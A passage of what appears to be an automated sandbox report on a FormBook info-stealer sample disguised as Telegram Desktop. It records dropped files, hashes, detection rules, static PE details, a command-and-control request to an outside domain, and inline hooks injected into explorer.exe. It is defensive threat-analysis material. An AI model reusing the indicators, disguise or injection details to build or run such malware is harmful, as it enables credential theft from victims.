 | 350969bc_by_Libranalysis.exe | malicious | 185.53.177.53
 | GLqbDRKePPp16Zr.exe | malicious | 185.53.177.12
 | sample3.exe | malicious | 185.53.177.12

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

Match | Associated Sample Name / URL | Detection | Context
C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe | IMG_105_13_676_571.exe | malicious |
 | SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exe | malicious |
 | 4-1.doc | malicious |
 | Order Inqury-93-23-20.doc | malicious |
 | IMG_7189012.exe | malicious |
 | SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exe | malicious |
 | 77.doc | malicious |
 | qlvti.exe | malicious |
 | RFQ-220818.xls | malicious |
 | RFQ-220818.xls | malicious |

                                                      Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New_1007572_021.exe.log
Process: C:\Users\user\Desktop\New_1007572_021.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1119
Entropy (8bit): 5.356708753875314
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
MD5: 3197B1D4714B56F2A6AC9E83761739AE
SHA1: 3B38010F0DF51C1D4D2C020138202DABB686741D
SHA-256: 40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
SHA-512: 58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
Malicious: true
Reputation: moderate, very likely benign file
                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe
Process: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3072
Entropy (8bit): 1.7089931293899303
Encrypted: false
SSDEEP: 24:7U6Id6l1iWyyyyyyyyytrUUUUUUUUUUgro:oO
MD5: 74BAFB3E707C7B0C63938AC200F99C7F
SHA1: 10C5506337845ED9BF25C73D2506F9C15AB8E608
SHA-256: 129450BA06AD589CF6846A455A5B6B5F55E164EE4906E409EB692AB465269689
SHA-512: 5B24DC5ACD14F812658E832B587B60695FB16954FCA006C2C3A7382EF0EC65C3BD1AAF699425C49FF3CCEEF16869E75DD6F00EC189B9F673F08F7E1B80CF7781
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 5%
• Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:
• Filename: IMG_105_13_676_571.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exe, Detection: malicious
• Filename: 4-1.doc, Detection: malicious
• Filename: Order Inqury-93-23-20.doc, Detection: malicious
• Filename: IMG_7189012.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exe, Detection: malicious
• Filename: 77.doc, Detection: malicious
• Filename: qlvti.exe, Detection: malicious
• Filename: RFQ-220818.xls, Detection: malicious
• Filename: RFQ-220818.xls, Detection: malicious
Reputation: moderate, very likely benign file
                                                      Preview: MZl.....................@.......Win32 Program!..$......!.L.!`...GoLink, GoAsm www.GoDevTool.com.PE..L....y.>..........................................@..........................0......C................................................ ..............................................................................................................code................................ ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe
Process: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 186368
Entropy (8bit): 7.314572114292142
Encrypted: false
SSDEEP: 3072:4dqYxe9j7g+D8OwXoopyPS5O1lFqRKMhZ6L7Ne61PCbyl2:4kXh8OIoYyq5ILqRKMo7cFN
MD5: 48ECE2CA39A9EAE7FCED7418CF071D46
SHA1: 7570995CBF699088A8F208015CB2C92BE5BC837A
SHA-256: 4119B29BC938578D5D243DB714D0619228D37C10CCAA52925F9E81A410720D59
SHA-512: E897FDED4B643054796E410CADCC348C1215C934FE70F5407E36E9F10E59E2B10B7EDCBB99D746709AEF8FF498D98D848ADA90FB477EA732A128EE138ED0FD3B
Malicious: true
Yara Hits:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: JPCERT/CC Incident Response Group
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 49%
• Antivirus: ReversingLabs, Detection: 86%
                                                      Preview: MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$............f..f..f......f......f......f.Rich.f.................PE..L.....N..........................................@.......................................@..........................................................................................................................................................text............................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
Process: C:\Users\user\Desktop\New_1007572_021.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 455168
Entropy (8bit): 7.937198220453206
Encrypted: false
SSDEEP: 12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
MD5: 41137FD61B9CC0D92225C91660A5902C
SHA1: 15D023FD6D344CB18243469A3EE01FEA6BB189AF
SHA-256: B04306FA8223C20A1ABAAA6AEB5CABB2A83DC04337BEB2ACFD47784B34B682BC
SHA-512: E32EE01FD957EE49F6BFCEFF4BC58B8B695111EF7416F8487398CBFAFD16B2EEAE0B79C41A8071075FD4E09D584CB642393F9E1655A5D70AB3135ADDD2E7ECBA
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 28%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@.................................@...K........F...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B................p.......H........<...,......,....i..,\...........................................0..>........(.... ....~....:....&8....8........E........8.....(....8....*...s....o....*.0..}.......8m.......E....[.......8V....{....(....8....8....8......(.... ....~c...9....&8.....{....9.... ....~2...:....&8....*.:....8........0..........8........E............n.......8......(....8......(....8'...........s....(.... ....~K...9....&8..... .... ....s....(.... ....~t...:....&8y....r...p(....8.....(....8.....
C:\Users\user\AppData\Local\Temp\New_1007572_021.exe:Zone.Identifier
Process: C:\Users\user\Desktop\New_1007572_021.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
                                                      Preview: [ZoneTransfer]....ZoneId=0

                                                      Static File Info

                                                      General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.937198220453206
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
File name: New_1007572_021.exe
File size: 455168
MD5: 41137fd61b9cc0d92225c91660a5902c
SHA1: 15d023fd6d344cb18243469a3ee01fea6bb189af
SHA256: b04306fa8223c20a1abaaa6aeb5cabb2a83dc04337beb2acfd47784b34b682bc
SHA512: e32ee01fd957ee49f6bfceff4bc58b8b695111ef7416f8487398cbfafd16b2eeae0b79c41a8071075fd4e09d584cb642393f9e1655a5d70ab3135addd2e7ecba
SSDEEP: 12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@................................

                                                      File Icon

Icon Hash: 888c9abc8c8ad8d8

                                                      Static PE Info

                                                      General

Entrypoint: 0x46c58e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0xDF29736D [Sun Aug 22 17:54:53 2088 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]

                                                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6c540 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6e000 | 0x46f4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x74000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                      Sections

                                                      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                      .text   0x2000           0x6a594       0x6a600   False     0.982139578437   data       7.98710710749   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc   0x6e000          0x46f4        0x4800    False     0.181206597222   data       4.45766439274   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc  0x74000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      Name           RVA      Size    Type                                                                        Language  Country
                                                      RT_ICON        0x6e130  0x4028  dBase III DBT, version number 0, next free block index 40
                                                      RT_GROUP_ICON  0x72158  0x14    data
                                                      RT_VERSION     0x7216c  0x39c   data
                                                      RT_MANIFEST    0x72508  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                      Imports

                                                      DLL          Import
                                                      mscoree.dll  _CorExeMain

                                                      Version Infos

                                                      Description       Data
                                                      Translation       0x0000 0x04b0
                                                      LegalCopyright    Copyright (C) 2014-2021
                                                      Assembly Version  2.7.4.0
                                                      InternalName      New_1007572_021.exe
                                                      FileVersion       2.7.4.0
                                                      CompanyName       Telegram FZ-LLC
                                                      LegalTrademarks
                                                      Comments          Telegram Desktop
                                                      ProductName       Telegram Desktop
                                                      ProductVersion    2.7.4.0
                                                      FileDescription   Telegram Desktop
                                                      OriginalFilename  New_1007572_021.exe

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      Timestamp                 Protocol  SID   Message                         Source Port  Dest Port  Source IP      Dest IP
                                                      08/03/21-19:50:15.399423  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49760      185.53.178.50  192.168.2.4

                                                      Network Port Distribution

                                                      TCP Packets

                                                      Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                      Aug 3, 2021 19:50:15.349270105 CEST  49760        80         192.168.2.4    185.53.178.50
                                                      Aug 3, 2021 19:50:15.365813971 CEST  80           49760      185.53.178.50  192.168.2.4
                                                      Aug 3, 2021 19:50:15.366018057 CEST  49760        80         192.168.2.4    185.53.178.50
                                                      Aug 3, 2021 19:50:15.382523060 CEST  80           49760      185.53.178.50  192.168.2.4
                                                      Aug 3, 2021 19:50:15.382633924 CEST  49760        80         192.168.2.4    185.53.178.50
                                                      Aug 3, 2021 19:50:15.399370909 CEST  80           49760      185.53.178.50  192.168.2.4
                                                      Aug 3, 2021 19:50:15.399422884 CEST  80           49760      185.53.178.50  192.168.2.4
                                                      Aug 3, 2021 19:50:15.399449110 CEST  80           49760      185.53.178.50  192.168.2.4
                                                      Aug 3, 2021 19:50:15.399853945 CEST  49760        80         192.168.2.4    185.53.178.50
                                                      Aug 3, 2021 19:50:15.399990082 CEST  49760        80         192.168.2.4    185.53.178.50
                                                      Aug 3, 2021 19:50:15.416416883 CEST  80           49760      185.53.178.50  192.168.2.4

                                                      UDP Packets

                                                      Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                                      Aug 3, 2021 19:48:11.287277937 CEST  54531        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:11.312505007 CEST  53           54531      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:11.646749973 CEST  49714        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:11.674344063 CEST  53           49714      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:12.411608934 CEST  58028        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:12.446872950 CEST  53           58028      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:12.730632067 CEST  53097        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:12.770869970 CEST  53           53097      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:13.400338888 CEST  49257        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:13.436501980 CEST  53           49257      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:14.382891893 CEST  62389        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:14.416975975 CEST  53           62389      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:15.471899986 CEST  49910        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:15.496669054 CEST  53           49910      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:16.402900934 CEST  55854        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:16.430919886 CEST  53           55854      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:17.192343950 CEST  64549        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:17.219954014 CEST  53           64549      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:18.285489082 CEST  63153        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:18.321301937 CEST  53           63153      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:19.212033987 CEST  52991        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:19.236999035 CEST  53           52991      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:20.024746895 CEST  53700        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:20.080260992 CEST  53           53700      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:20.851438046 CEST  51726        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:20.884269953 CEST  53           51726      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:21.737622976 CEST  56794        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:21.764936924 CEST  53           56794      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:22.957417011 CEST  56534        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:22.990452051 CEST  53           56534      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:23.796653986 CEST  56627        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:23.821459055 CEST  53           56627      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:24.635401011 CEST  56621        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:24.660094023 CEST  53           56621      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:25.416462898 CEST  63116        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:25.451778889 CEST  53           63116      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:26.146811008 CEST  64078        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:26.187503099 CEST  53           64078      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:26.889657974 CEST  64801        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:26.914860010 CEST  53           64801      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:48:42.516658068 CEST  61721        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:48:42.552501917 CEST  53           61721      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:03.866585016 CEST  51255        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:03.904426098 CEST  53           51255      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:04.029683113 CEST  61522        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:04.068367004 CEST  53           61522      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:04.593688011 CEST  52337        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:04.635272980 CEST  53           52337      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:05.538587093 CEST  55046        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:05.572464943 CEST  53           55046      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:05.932722092 CEST  49612        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:05.968030930 CEST  53           49612      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:06.440834045 CEST  49285        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:06.482620955 CEST  53           49285      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:07.755753994 CEST  50601        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:07.788120031 CEST  53           50601      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:08.429970980 CEST  60875        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:08.455038071 CEST  53           60875      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:09.285213947 CEST  56448        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:09.317590952 CEST  53           56448      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:10.636471987 CEST  59172        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:10.671652079 CEST  53           59172      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:11.716171026 CEST  62420        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:11.748574018 CEST  53           62420      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:12.524396896 CEST  60579        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:12.558231115 CEST  53           60579      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:20.701026917 CEST  50183        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:20.737951040 CEST  53           50183      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:50.337585926 CEST  61531        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:50.372936964 CEST  53           61531      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:49:51.853117943 CEST  49228        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:49:51.887586117 CEST  53           49228      8.8.8.8      192.168.2.4
                                                      Aug 3, 2021 19:50:15.298187971 CEST  59794        53         192.168.2.4  8.8.8.8
                                                      Aug 3, 2021 19:50:15.339657068 CEST  53           59794      8.8.8.8      192.168.2.4

                                                      DNS Queries

                                                      Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                      Type            Class
                                                      Aug 3, 2021 19:50:15.298187971 CEST  192.168.2.4  8.8.8.8  0x6317    Standard query (0)  www.comfsresidential.com  A (IP address)  IN (0x0001)

                                                      DNS Answers

                                                      Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                      CName  Address        Type            Class
                                                      Aug 3, 2021 19:50:15.339657068 CEST  8.8.8.8    192.168.2.4  0x6317    No error (0)  www.comfsresidential.com         185.53.178.50  A (IP address)  IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.comfsresidential.com

                                                      HTTP Packets

                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                      0           192.168.2.4  49760        185.53.178.50   80                C:\Windows\explorer.exe

                                                      Timestamp                            kBytes transferred  Direction  Data
                                                      Aug 3, 2021 19:50:15.382633924 CEST  6717                OUT        GET /cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h HTTP/1.1
                                                                                                                          Host: www.comfsresidential.com
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                      Aug 3, 2021 19:50:15.399422884 CEST  6717                IN         HTTP/1.1 403 Forbidden
                                                                                                                          Server: nginx
                                                                                                                          Date: Tue, 03 Aug 2021 17:50:15 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 146
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function Name  Hook Type  Active in Processes
                                                      PeekMessageA   INLINE     explorer.exe
                                                      PeekMessageW   INLINE     explorer.exe
                                                      GetMessageW    INLINE     explorer.exe
                                                      GetMessageA    INLINE     explorer.exe

                                                      Processes

                                                      Process: explorer.exe, Module: user32.dll
                                                      Function Name  Hook Type  New Data
                                                      PeekMessageA   INLINE     0x48 0x8B 0xB8 0x8C 0xCE 0xEF
                                                      PeekMessageW   INLINE     0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                                      GetMessageW    INLINE     0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                                      GetMessageA    INLINE     0x48 0x8B 0xB8 0x8C 0xCE 0xEF

                                                      Statistics

                                                      Behavior


                                                      System Behavior

                                                      General

                                                      Start time: 19:48:16
                                                      Start date: 03/08/2021
                                                      Path: C:\Users\user\Desktop\New_1007572_021.exe
                                                      Wow64 process (32bit): true
                                                      Commandline: 'C:\Users\user\Desktop\New_1007572_021.exe'
                                                      Imagebase: 0x800000
                                                      File size: 455168 bytes
                                                      MD5 hash: 41137FD61B9CC0D92225C91660A5902C
                                                      Has elevated privileges: true
                                                      Has administrator privileges: true
                                                      Programmed in: .Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation: low

                                                      General

                                                      Start time: 19:48:53
                                                      Start date: 03/08/2021
                                                      Path: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      Wow64 process (32bit): true
                                                      Commandline: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      Imagebase: 0xb50000
                                                      File size: 455168 bytes
                                                      MD5 hash: 41137FD61B9CC0D92225C91660A5902C
                                                      Has elevated privileges: true
                                                      Has administrator privileges: true
                                                      Programmed in: C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 28%, ReversingLabs
                                                      Reputation: low

                                                      General

                                                      Start time: 19:48:55
                                                      Start date: 03/08/2021
                                                      Path: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe
                                                      Wow64 process (32bit): true
                                                      Commandline: 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
                                                      Imagebase: 0x400000
                                                      File size: 3072 bytes
                                                      MD5 hash: 74BAFB3E707C7B0C63938AC200F99C7F
                                                      Has elevated privileges: true
                                                      Has administrator privileges: true
